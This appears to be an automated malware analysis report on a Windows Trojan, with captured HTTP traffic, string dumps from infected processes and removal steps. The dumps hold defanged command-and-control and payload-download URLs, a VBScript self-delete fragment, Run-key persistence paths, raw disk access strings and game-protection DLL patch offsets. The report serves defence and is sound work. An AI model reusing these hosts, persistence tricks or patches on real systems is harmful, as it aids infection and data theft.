Last-Modified: Mon, 12 Dec 2016 06:00:18 GMT
Accept-Ranges: bytes
ETag: "7254ef33d54d21:0"
Server: Microsoft-IIS/8.5
VTag: 791789525600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 554
Cache-Control: max-age=900
Date: Mon, 09 Jan 2017 19:56:22 GMT
Connection: keep-alive

<<< skipped >>>

GET /MFUwUzBRME8wTTAJBgUrDgMCGgUABBTkLVLomfJQOu5CFIgPOR73ljBRHAQU+L36r3N3xscb+UtNEafRM6+vchECFEOZrYpYgDwxeWGj/HetMtWiXvU/ HTTP/1.1
Cache-Control: max-age = 339923
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 09:41:21 GMT
If-None-Match: "c06e9a4e33eec9dd813b8faff15397229f914d2a"
User-Agent: Microsoft-CryptoAPI/6.1
Host: vassg142.ocsp.omniroot.com


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 1746
Last-Modified: Mon, 09 Jan 2017 19:37:04 GMT
ETag: "ec45c567fc5214f03c43ba8d5e9f2c3d28f75278"
Cache-Control: public, no-transform, must-revalidate, max-age=339001
Expires: Fri, 13 Jan 2017 18:06:28 GMT
Date: Mon, 09 Jan 2017 19:56:27 GMT
Connection: keep-alive

<<< skipped >>>

GET /ip2city.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.ip138.com
Cache-Control: no-cache


HTTP/1.0 302 Moved Temporarily
Server: Cdn Cache Server V2.0
Date: Mon, 09 Jan 2017 19:56:19 GMT
Content-Length: 0
Location: hXXp://city.ip138.com/ip2city.asp


GET /CRL/Omniroot2025.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 16 Nov 2013 06:15:02 GMT
If-None-Match: "200da-5b6-4eb453c33260e"
User-Agent: Microsoft-CryptoAPI/6.1
Host: cdp1.public-trust.com


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-pkcs7-crl
Date: Mon, 09 Jan 2017 19:55:41 GMT
Etag: "200c0-ca3-54535e76797e9"
Last-Modified: Tue, 03 Jan 2017 19:45:01 GMT
Server: ECS (arn/45CB)
X-Cache: HIT
Content-Length: 3235

<<< skipped >>>

GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAqF15UlAVwhXc+YAAQACoXU= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.msocsp.com


HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 19:55:46 GMT
Content-Type: application/ocsp-response
Content-Length: 1820
Connection: keep-alive
Set-Cookie: __cfduid=d7e1e04fd4e94588f0795a5adab74f5221483991746; expires=Tue, 09-Jan-18 19:55:46 GMT; path=/; domain=.msocsp.com; HttpOnly
Last-Modified: Mon, 09 Jan 2017 17:22:32 GMT
Expires: Fri, 13 Jan 2017 17:22:32 GMT
ETag: "baeb3b785b82d293b20f180a8018c16b1629be18"
Cache-Control: max-age=10800,public,no-transform,must-revalidate
X-Cache: HIT
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 31ea72dfc3a24014-SOF

<<< skipped >>>

GET /fwlink?linkid=30219&locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: GamesWebServiceLocations
Host: go.microsoft.com


HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Location: hXXp://movie.metaservices.microsoft.com/locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Date: Mon, 09 Jan 2017 19:55:32 GMT
Connection: keep-alive
HTTP/1.1 302 Moved Temporarily..Cache-Control: no-cache..Pragma: no-ca
che..Expires: -1..Location: hXXp://movie.metaservices.microsoft.com/lo
cater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&
clientType=VISTA_GAMES&clientVersion=6.1.2..Server: Microsoft-IIS/8.5.
.X-AspNetMvc-Version: 5.2..X-AspNet-Version: 4.0.30319..X-Powered-By:
ASP.NET..Content-Length: 0..Date: Mon, 09 Jan 2017 19:55:32 GMT..Conne
ction: keep-alive..


The Trojan connects to the servers at the following location(s):

%original file name%.exe_2180:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
Jiu2.iu
1wK(.wS
wininet.dll
ws2_32.dll
IPHLPAPI.DLL
oleaut32.dll
ole32.dll
OleAut32.dll
kernel32.dll
ShellExecuteA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
mm.exe
@.reloc
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GET %s HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Host: %s
,5-%d
Range:bytes=0-%s
POST /?%d HTTP/1.1
Content-Length: %d
X-%c: %c
hXXp://
VVV.%s
Windows 8
Windows 7
Windows Vista
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows 2008
%d * %dMHz
dnsapi.dll
KERNEL32.dll
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
.temp.fortest
\WindowsUpdate
F:\Projects\7
\20150606\Server\Release\Server.pdb
WS2_32.dll
DNSAPI.dll
WinExec
GetProcessHeap
GetCPInfo
USER32.dll
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
SHLWAPI.dll
zcÁ
MFC42.DLL
MSVCRT.dll
_acmdln
OLEAUT32.dll
function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);
CWebBrowser2
88.200jh.com
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0 0$0(0,00040~0
;*;/;;;@;_;
2 2$2024282
hXXp://VVV.ip138.com/ips.asp?ip=
hXXp://VVV.ip138.com/ip2city.asp
tem.vbs
fso.DeleteFile("
Set fso = CreateObject("Scripting.FileSystemObject")
Wscript.Sleep(1000)
hXXp://183.60.200.160:8080/yy.txt
</url>
<url>
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
hXXp://VVV.900cpa.cc:8080/tongji.php?ver=hongchen&mac=
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
\\.\PhysicalDrive0
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
RASAPI32.dll
GetWindowsDirectoryA
GetKeyState
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
COMCTL32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
%Program Files%\HC188.exe
\dnf.exe
\cscapi.dll
.vmp0
`.vmp1
.reloc
@.rsrc
ExitWindowsEx
msacm32.dll
acmDriverAddA
acmDriverAddW
acmDriverClose
acmDriverDetailsA
acmDriverDetailsW
acmDriverEnum
acmDriverID
acmDriverMessage
acmDriverOpen
acmDriverPriority
acmDriverRemove
tcj.dll
\\.\\physicaldrive0
\kernel32.dll
ntdll.dll
program internal error number is %d.
:"%s"
:"%s".
Pc<g.aDU
.naT7
8n%xgD
.Cb1t%v
m*m.kZcV0~,,
m.tCgLbO
"]@_0m.YT1~
t-f%u
O^5l%x)_p
,a.Epc)
.zKQ\XcCp
7~%dP_i
<M.ExL
^NcMdCN
f%uXt
%X_B_d*
.OBj[V
|%dj8g:Y4
.vKUn
t9ZG>q,k.kD
JKHY8k,q*o.Zk
/.hzz" 
%dGFa
yHXcRT]
{$q.cRYs
.aH`SVA
w*q(o.YT;d1
i2USER32.dll
o(.CV
o .CP
.eD]6
X3f_.ep>
u(o.eTa
URLg8[
<4,$?7/'
(3-!0,1'8"5.*2$
&&&&6666????
""""****
2222::::
$$$$\\\\
00006666
####====
CreateWindowStationA
EnumChildWindows
MsgWaitForMultipleObjects
cscapi.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion
Windows 10
Windows 8.1
Windows Server 2012
Windows Server 2008 R2
Windows Server 2008
Windows Server 2003
Windows Server 2003 R2
Windows NT 4.0
Windows 95
Windows 98
Windows Me
Web Edition
SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild
VVV.ezdun.com
VVV.ezdun.com
\gcg.txt
NTDLL.DLL
CloseWindowStation
GetAsyncKeyState
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
5-5Z5m5u5}5
;%;-;1;7;
4E8:8&?
=2,3,4,5,6,7,8
!.qn%
X].XMgW
.dq?]
\start\DNFchina.exe
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
VERSION.dll
RegCreateKeyA
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
libpng error: %s
libpng warning: %s
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
urllifdbFFF- ,DCD C
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
\wtsapi32.dll
DNF.exe
20:25:00
hXXp://dnf2020.cccpan.com
24266 //
3 //[1]-
64024 //
TerSafe.dll
TerSafe.dll 156228 10 100=c3
TerSafe.dll 156228 10 e0=c3
TerSafe.dll 156228 c 400=195
TerSafe.dll 156228 c 400=c3
TerSafe.dll 156228 c 400=85
TerSafe.dll 156228 10 100=80
WINMM.DLL
RegisterHotKey
UnregisterHotKey
TXPFProxy.dll
%d%d%d
rundll32.exe shell32.dll,
8#8.8]8~8
4_5
; ;$;(;9;
1%1S1g1:2A2H2O2
5%5X5w5
< =4=@=\=|=
?$?(?0?4?
; ;$;(;,;0;4;
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
Wp.Iw
A.zkt@
5p|%U
ù'p
\uap.ini
\ldyz.yz
ldyz.yz
C$%cmb
.ppM|
 aZ.mO
%-^
.hk;~
KERNEL32.DLL
MSIMG32.dll
MSVFW32.dll
SkinH_EL.dll
(ldyz.yz)
GetCommunicationPass
ReSetPassWord
Get_SysMessagemsgid
Get_SmsMessagemsgid
"!& 7/&)4)!"0A149;>>>%.DIC<H7=>;
d]%CX
E!T,.UUj
(%u}p
$.At@
VVV.dywt.com.cn
iSpeak.exe
EnumWindows
c:\%original file name%.exe
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
BrowserServer.EXE
(*.*)
!"#$%&'()* 
1.0.0.0
575071031
(hXXp://VVV.eyuyan.com)
1, 0, 6, 6
9.0.0.0

%original file name%.exe_2180_rwx_6A8C4000_0000B000:

.?AVCRexPortHandle@@
.?AUIRexPortHandle@@
.?AVCRexSocketMsg@@
.?AVCHttpParser@@
.?AVCHttpRexClient@@

HC188.exe_2748:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
iu2.iu
wininet.dll
ws2_32.dll
IPHLPAPI.DLL
oleaut32.dll
ole32.dll
OleAut32.dll
kernel32.dll
ShellExecuteA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
mm.exe
@.reloc
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GET %s HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Host: %s
,5-%d
Range:bytes=0-%s
POST /?%d HTTP/1.1
Content-Length: %d
X-%c: %c
hXXp://
VVV.%s
Windows 8
Windows 7
Windows Vista
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows 2008
%d * %dMHz
dnsapi.dll
KERNEL32.dll
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
.temp.fortest
\WindowsUpdate
F:\Projects\7
\20150606\Server\Release\Server.pdb
WS2_32.dll
DNSAPI.dll
WinExec
GetProcessHeap
GetCPInfo
USER32.dll
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
SHLWAPI.dll
zcÁ
MFC42.DLL
MSVCRT.dll
_acmdln
OLEAUT32.dll
function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);
CWebBrowser2
88.200jh.com
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0 0$0(0,00040~0
;*;/;;;@;_;
2 2$2024282
hXXp://VVV.ip138.com/ips.asp?ip=
hXXp://VVV.ip138.com/ip2city.asp
tem.vbs
fso.DeleteFile("
Set fso = CreateObject("Scripting.FileSystemObject")
Wscript.Sleep(1000)
hXXp://183.60.200.160:8080/yy.txt
</url>
<url>
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
hXXp://VVV.900cpa.cc:8080/tongji.php?ver=hongchen&mac=
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
\\.\PhysicalDrive0
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
RASAPI32.dll
GetWindowsDirectoryA
GetKeyState
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
COMCTL32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
own.818wy.com:8089/hyaz2_y_10031.exe
Via: cache1.l2nu17[0,304-0,H], cache18.l2nu17[0,0], kunlun4.cn345[0,200-0,H], kunlun10.cn345[0,0]
X-Cache: HIT TCP_MEM_HIT dirn:10:903694853
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
location.href="hXXp://VVV.ip138.com/ips138.asp"   location.search;
<a href="hXXp://VVV.ip138.com/ips138.asp">IP
%Program Files%\HC188.exe
#include "l.chs\afxres.rc" // Standard components
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
BrowserServer.EXE
(*.*)

otqvyruekg.exe_3296:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GET %s HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Host: %s
,5-%d
Range:bytes=0-%s
POST /?%d HTTP/1.1
Content-Length: %d
X-%c: %c
hXXp://
VVV.%s
Windows 8
Windows 7
Windows Vista
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows 2008
%d * %dMHz
dnsapi.dll
KERNEL32.dll
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
.temp.fortest
\WindowsUpdate
F:\Projects\7
\20150606\Server\Release\Server.pdb
WS2_32.dll
IPHLPAPI.DLL
DNSAPI.dll
WinExec
GetProcessHeap
GetCPInfo
USER32.dll
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
SHLWAPI.dll
zcÁ
MFC42.DLL
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);
CWebBrowser2
88.200jh.com
C:\Windows\WindowsUpdate\otqvyruekg.exe
C:\Windows\WindowsUpdate
otqvyruekg.exe
vqbvtgijv.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0 0$0(0,00040~0
;*;/;;;@;_;
2 2$2024282
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
BrowserServer.EXE

mmc.exe_3368:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
iu2.iu
kernel32.dll
user32.dll
ntdll.dll
psapi.dll
shell32.dll
advapi32.dll
ShellExecuteA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
%WinDir%\Media\McIe.wav
%WinDir%\Media\Mcfg.wav
%WinDir%\syswow64\dllhost.exe
%WinDir%\st.dat
%WinDir%\star.dat
%WinDir%\Media\
as.bat
explorer.exe
winlogon.exe
360tray.exe
minibaidu.exe
@Dqc.exe
MIJ.exe
27e.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
ole32.dll
__MSVCRT_HEAP_SELECT
GetProcessHeap
WinExec
GetWindowsDirectoryA
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
COMCTL32.dll
oledlg.dll
WS2_32.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCOleDispatchException@@
zcÁ
92df787bea434c33.exe
C:\Windows\system32\mmc.exe
#include "l.chs\afxres.rc" // Standard components
2"&,\45>
*.**)
.uy}"
(*.*)

jyueservice.exe_3004:

.text
`.rdata
@.data
.rsrc
@.reloc
SPSSSSSSh
hu2.iu
0123456789abcdef\\.\PhysicalDrive%d
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
\\.\Scsi%d:
XXXXXX
Visual C++ CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
GetProcessWindowStation
operator
%s.log
OpenSCManager failed, error code = %d
Failed to create service %s, error code = %d
Service %s installed
OpenService failed, error code = %d
Failed to delete service %s
Service %s removed
d/d/d, d:d:d
ControlService failed, error code = %d
StartService failed, error code = %d
StartServiceCtrlDispatcher failed, error code = %d
RegisterServiceCtrlHandler failed, error code = %d
SetServiceStatus failed, error code = %d
B5MUpdate.exe
Unrecognized opcode %d
"%s" %s
Start process SUCCEEDED: '%s'
Failed to start program '%s', error code = %d
RIBridage.exe
WTSAPI32.dll
USERENV.dll
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
WinHttpReceiveResponse
WinHttpSetTimeouts
WinHttpSetOption
WinHttpGetIEProxyConfigForCurrentUser
WinHttpSendRequest
WinHttpWriteData
WinHttpConnect
WinHttpCloseHandle
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpOpen
WinHttpOpenRequest
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpReadData
WinHttpAddRequestHeaders
WINHTTP.dll
SHLWAPI.dll
IPHLPAPI.DLL
GetCPInfo
PeekNamedPipe
GetProcessHeap
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.log
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2024282<2
7%8X8g8p8
? ?$?(?,?
> >$>(>,>0>4>8><>@>
6 6(60646
succ %s line:%d, error:%d
LX
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
WinHttpClient
hXXp://
VVV.jyrili.com
DownLoadUrl new WinHttpClient failed!
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
DownLoadUrl SendHttpRequest failed and request Url is:
DownLoadUrl download failed!
DownLoadUrl write file failed and file is:
DownLoadUrl open file failed and file is:
"url":
/client.do/?method=svcupdate&version=
4.0.3.0
\svcupdate.exe
RLServic.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    HC188.exe:2748
    WScript.exe:2632
    src2011.tmp:372
    src2011.exe:3732
    bFuAq.exe:3352
    1819.exe:3564
    rundll32.exe:3404
    mm.exe:2712
    regsvr32.exe:2260
    mmc.exe:3368
    guide.exe:2532
    guide.exe:672
    otqvyruekg.exe:3296

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\1819.exe (50 bytes)
    C:\Windows\mm.exe (299 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\hyaz2_Y_10031[1].exe (28065 bytes)
    C:\Windows\src2011.exe (50 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\src2011[1].exe (565882 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\yy[1].txt (301 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1819[1].exe (527707 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-B9OOF.tmp (1281 bytes)
